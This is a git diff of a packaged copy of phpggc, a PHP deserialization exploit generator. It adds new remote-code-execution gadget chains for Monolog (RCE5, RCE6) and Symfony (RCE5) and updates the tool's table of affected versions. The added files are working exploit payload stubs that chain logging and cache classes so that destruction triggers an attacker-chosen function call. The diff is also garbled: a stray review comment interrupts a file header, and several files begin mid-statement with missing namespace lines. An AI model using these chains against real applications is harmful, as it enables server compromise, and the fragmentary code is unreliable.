diff --git a/README.md b/README.md
index 743295f..3421eb0 100644
--- a/README.md
+++ b/README.md
@@ -41,10 +41,12 @@
 Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct *
 Magento/FW1 ? <= 1.9.4.0 File write __destruct *
 Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct
-Monolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destruct
-Monolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destruct
-Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct
+Monolog/RCE1 1.4.1<=1.6.1 & 1.17.2<=2.2.0+ RCE (Function call) __destruct
+Monolog/RCE2 1.4.1 <= 2.2.0+ RCE (Function call) __destruct
+Monolog/RCE3 1.0.2 <= 1.10.0 RCE (Function call) __destruct
 Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct *
+Monolog/RCE5 1.25 <= 2.2.0+ RCE (Function call) __destruct *
+Monolog/RCE6 1.10.0 <= 2.2.0+ RCE (Function call) __destruct *
 Phalcon/RCE1 <= 1.2.2 RCE __wakeup *
 PHPCSFixer/FD1 <= 2.17.3 File delete __destruct
 PHPCSFixer/FD2 <= 2.17.3 File delete __destruct
@@ -67,6 +69,7 @@
 Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct *
 Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct *
 Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct *
+Symfony/RCE5 5.2.* RCE (Function call) __destruct
 TCPDF/FD1 <= 6.3.5 File delete __destruct *
 ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct *
 WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct *
diff --git a/debian/changelog b/debian/changelog
index 60174cc..0a82c1a 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,9 @@
+phpggc (0.20210506-0kali1) UNRELEASED; urgency=low
+
+ * New upstream release.
+
+ -- Kali Janitor Fri, 14 May 2021 15:29:16 -0000
+
 phpggc (0.20210218-0kali1) kali-dev; urgency=medium
 
  * Configure debian/watch to track git master
diff --git a/gadgetchains/Monolog/RCE/5/chain.php b/gadgetchains/Monolog/RCE/5/chain.php
new file mode 100644
index 0000000..41341a0
--- /dev/null
+++ b/gadgetchains/Monolog/RCE/5/chain.php
@@ -0,0 +1,19 @@
+__destruct() => close() => flushBuffer() => handleBatch($records)
+
+ class FingersCrossedHandler {
+ protected $passthruLevel;
+ protected $buffer = array();
+ protected $handler;
+
+ public function __construct($param, $handler)
+ {
+ $this->passthruLevel = 0;
+ $this->buffer = ['test' => [$param, 'level' => null]];
+ $this->handler = $handler;
+ }
+
+ }
+
+ class GroupHandler {
+ protected $processors = array();
+ public function __construct($function)
+ {
+ $this->processors = ['current', $function];
+ }
+
+ }
+}
diff --git a/gadgetchains/Monolog/RCE/6/chain.php b/gadgetchains/Monolog/RCE/6/chain.php
new file mode 100644
index 0000000..2b8baa7
--- /dev/null
+++ b/gadgetchains/Monolog/RCE/6/chain.php
@@ -0,0 +1,19 @@
+__destruct() => close() => flushBuffer() => handleBatch($records)
+
+ class FingersCrossedHandler {
+ protected $passthruLevel;
+ protected $buffer = array();
+ protected $handler;
+
+ public function __construct($param, $handler)
+ {
+ $this->passthruLevel = 0;
+ $this->buffer = ['test' => [$param, 'level' => null]];
+ $this->handler = $handler;
+ }
+
+ }
+
+ class BufferHandler
+ {
+ protected $handler;
+ protected $bufferSize = -1;
+ protected $buffer;
+ # ($record['level'] < $this->level) == false
+ protected $level = null;
+ protected $initialized = true;
+ # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false
+ protected $bufferLimit = -1;
+ protected $processors;
+
+ function __construct($function)
+ {
+ $this->processors = ['current', $function];
+ }
+ }
+
+}
diff --git a/gadgetchains/Symfony/RCE/5/chain.php b/gadgetchains/Symfony/RCE/5/chain.php
new file mode 100644
index 0000000..ace0f5f
--- /dev/null
+++ b/gadgetchains/Symfony/RCE/5/chain.php
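Review bot: `function __construct($function)` in the BufferHandler stub is declared without a visibility keyword, while the FingersCrossedHandler and GroupHandler constructors in the same change are written `public function __construct(...)`; the same omission appears on FormErrorIterator's constructor in the Symfony section. PHP treats an unmarked method as public, so this is a style point only, but the stubs should agree: `public function __construct($function)`. The stubs also mix `array()` and `[]` for array literals; picking the short form throughout would read more consistently. The opening of the enclosing namespace block is not visible in this hunk, so which file these classes belong to is inferred from the preceding header.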
@@ -0,0 +1,19 @@
+createCacheItem = $createCacheItem;
+ $this->pool = $pool;
+ $this->namespace = '';
+ }
+ }
+
+
+ class NullAdapter
+ {
+ private $createCacheItem;
+
+ public function __construct($createCacheItem)
+ {
+ $this->createCacheItem = $createCacheItem;
+ }
+ }
+}
+
+namespace Symfony\Component\Console\Helper
+{
+ class Dumper
+ {
+ private $handler;
+
+ public function __construct($handler)
+ {
+ $this->handler = $handler;
+ }
+ }
+}
+
+
+namespace Symfony\Component\Cache\Traits
+{
+ class RedisProxy
+ {
+ private $redis;
+ private $initializer;
+
+ public function __construct($initializer, $redis)
+ {
+ $this->initializer = $initializer;
+ $this->redis = $redis;
+ }
+ }
+}
+
+namespace Symfony\Component\Form
+{
+
+ class FormErrorIterator
+ {
+ public $form;
+ private $errors;
+
+ function __construct($errors, $form)
+ {
+ $this->errors = $errors;
+ $this->form = $form;
+ }
+ }
+}
+
+
+namespace Symfony\Component\HttpKernel\DataCollector
+{
+ class DumpDataCollector
+ {
+ protected $data;
+ private $stopwatch;
+ private $fileLinkFormat;
+ private $dataCount = 0;
+ private $isCollected = false;
+ private $clonesCount = 0;
+ private $clonesIndex = 0;
+
+ public function __construct($function, $command)
+ {
+ $this->data = [
+ [
+ "data" => "1",
+ "name" => new \Symfony\Component\Form\FormErrorIterator([
+ new \Symfony\Component\Form\FormErrorIterator(
+ [],
+ new \Symfony\Component\Cache\Traits\RedisProxy(
+ new \Symfony\Component\Console\Helper\Dumper([
+ new \Symfony\Component\Cache\Adapter\ProxyAdapter(
+ 'dd', // exit function
+ new \Symfony\Component\Cache\Adapter\NullAdapter($function)
+ ),
+ "getItem"
+ ]),
+ $command
+ )
+ )],
+ null
+ ),
+ "file" => "3",
+ "line" => "4"
+ ],
+ null,
+ null
+ ];
+ }
+ }
+}